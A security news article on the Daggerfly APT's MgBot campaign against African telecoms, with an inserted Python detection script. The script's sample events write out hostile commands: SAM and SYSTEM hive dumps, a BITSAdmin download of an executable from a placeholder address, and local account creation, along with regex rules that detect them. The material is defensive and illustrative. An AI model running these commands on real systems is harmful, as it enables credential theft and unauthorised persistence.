Daggerfly APT Targets African Telecoms Firm With New MgBot Malware

An APT group known as Daggerfly (also tracked as Evasive Panda and Bronze Highland) has been observed targeting telecom organizations in Africa using new plugins built on the MgBot malware framework.

A new advisory published by Symantec today states that the malicious campaign was first discovered in November 2022 and is likely still ongoing.

“The attackers have also been observed exploiting legitimate AnyDesk remote desktop software using the PlugX loader,” the advisory states.

“Use of the MgBot modular malware framework and PlugX loader has been previously associated with China-linked APTs.”


According to Symantec, the team first became aware of the attack via an AnyDesk connection found on a Microsoft Exchange mail server.

“The legitimate free antivirus software Rising was also used to sideload the PlugX loader onto the victim’s machine,” the team wrote.

Symantec also says the Daggerfly actors downloaded and installed AnyDesk on victim machines, alongside GetCredManCreds, a malware tool designed to extract stored credentials from the Windows Credential Manager. The report notes that the BITSAdmin and PowerShell tools were used as well.

“The reg.exe tool was also used to dump the SAM (Security Account Manager), SYSTEM and SECURITY registry hives. This would have allowed the adversary to extract credentials from the SAM database,” Symantec wrote. The SYSTEM hive carries the boot key needed to decrypt the password hashes stored in SAM, which is why the two are typically exported together.

To ensure persistence, the Daggerfly actors created local accounts.
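The command-line tradecraft described above (reg.exe hive exports, BITSAdmin downloads, local account creation with net user, and AnyDesk showing up on a mail server) is what a defender would hunt for in process-creation telemetry. The following Python is an added example, not code from Symantec or from the campaign; the rule patterns, the ProcessEvent field schema, the host and user names and the sample records are all constructed for illustration, and 198.51.100.7 is a documentation-range placeholder address.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 or
    Security 4688 event would carry). Hypothetical schema for this example."""
    host: str
    user: str
    image: str
    command_line: str


# Rule name -> pattern matched against the lower-cased command line.
# These patterns are this example's own assumptions, not published signatures.
RULES = {
    # reg.exe exporting SAM/SYSTEM/SECURITY; "reg query" or other hives do not match
    "reg_hive_dump": re.compile(
        r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b"),
    # BITSAdmin used as a download cradle
    "bitsadmin_download": re.compile(
        r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile|create)\b"),
    # local account creation via net/net1 (persistence)
    "local_account_creation": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b"),
    # AnyDesk execution: weak on its own, strong on a mail server or next to the rules above
    "anydesk_execution": re.compile(r"\banydesk(?:\.exe)?\b"),
}


def match_rules(event: ProcessEvent) -> list[str]:
    """Names of every rule the event's command line trips."""
    cmd = event.command_line.lower()
    return [name for name, pattern in RULES.items() if pattern.search(cmd)]


def detect(events) -> list[tuple[str, str, str]]:
    """Return (rule, host, command_line) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in match_rules(ev):
            hits.append((rule, ev.host, ev.command_line))
    return hits


def ttps_per_host(events) -> dict[str, set[str]]:
    """Distinct rule names observed on each host."""
    per_host: dict[str, set[str]] = defaultdict(set)
    for rule, host, _ in detect(events):
        per_host[host].add(rule)
    return dict(per_host)


def hosts_to_escalate(events, minimum_distinct_ttps: int = 2) -> list[str]:
    """Hosts showing several distinct TTPs from the chain above; a cluster of
    rules on one host is a much stronger signal than any single match."""
    return sorted(host for host, rules in ttps_per_host(events).items()
                  if len(rules) >= minimum_distinct_ttps)


EVENTS = [  # constructed sample records, not real telemetry
    ProcessEvent("ws01", "CORP\\jdoe", "C:\\Windows\\System32\\reg.exe",
                 "reg save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv"),
    ProcessEvent("ws01", "CORP\\jdoe", "C:\\Windows\\System32\\reg.exe",
                 "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system.hiv"),
    ProcessEvent("ws01", "CORP\\jdoe", "C:\\Windows\\System32\\bitsadmin.exe",
                 "bitsadmin /transfer upd /download /priority high "
                 "http://198.51.100.7/a.exe C:\\Users\\Public\\a.exe"),
    ProcessEvent("ws01", "CORP\\jdoe", "C:\\Windows\\System32\\net.exe",
                 "net user support P@ssw0rd! /add"),
    ProcessEvent("mail01", "NT AUTHORITY\\SYSTEM",
                 "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe",
                 "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service"),
    # benign admin activity that must not fire
    ProcessEvent("ws02", "CORP\\asmith", "C:\\Windows\\System32\\reg.exe",
                 "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
    ProcessEvent("ws02", "CORP\\asmith", "C:\\Windows\\System32\\net.exe",
                 "net user asmith"),
]


if __name__ == "__main__":
    for rule, host, cmd in detect(EVENTS):
        print(f"[{rule}] {host}: {cmd}")
    print("escalate:", hosts_to_escalate(EVENTS))
```

The per-host aggregation is the part worth keeping: each rule alone has a plausible benign explanation (backup scripts export hives, admins use BITS and create accounts), but one host running a hive dump, a BITS download and an account creation in the same window is the pattern the article describes and should be escalated as a unit.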

Symantec found that the plugins the attackers developed and deployed using the MgBot framework all carry information-gathering functionality.

These include a network scanner, Chrome and Firefox info stealers, a logging module, a QQ keylogger and message info stealer, an Active Directory enumerator, a password dumper, a screen and clipboard grabber, Outlook and Foxmail credential stealers, an audio capture tool, and a process watchdog script.

“All of these features would have allowed the attacker to gather a large amount of information from the victim’s machine,” Symantec said. “The functionality of these plugins also demonstrates that information gathering is the primary goal of the attackers during this campaign.”

Another threat actor that specializes in information gathering is YoroTrooper, a group recently discovered by Cisco Talos.
